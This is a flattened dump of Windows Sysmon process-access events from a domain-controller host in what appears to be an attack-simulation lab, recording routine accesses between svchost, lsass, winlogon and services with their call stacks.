13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.998{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.998{08A6967A-4754-6000-1A05-000000009A01}28844184C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.842{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0A00-000000009A01}8442520C:\Windows\system32\services.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.826{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 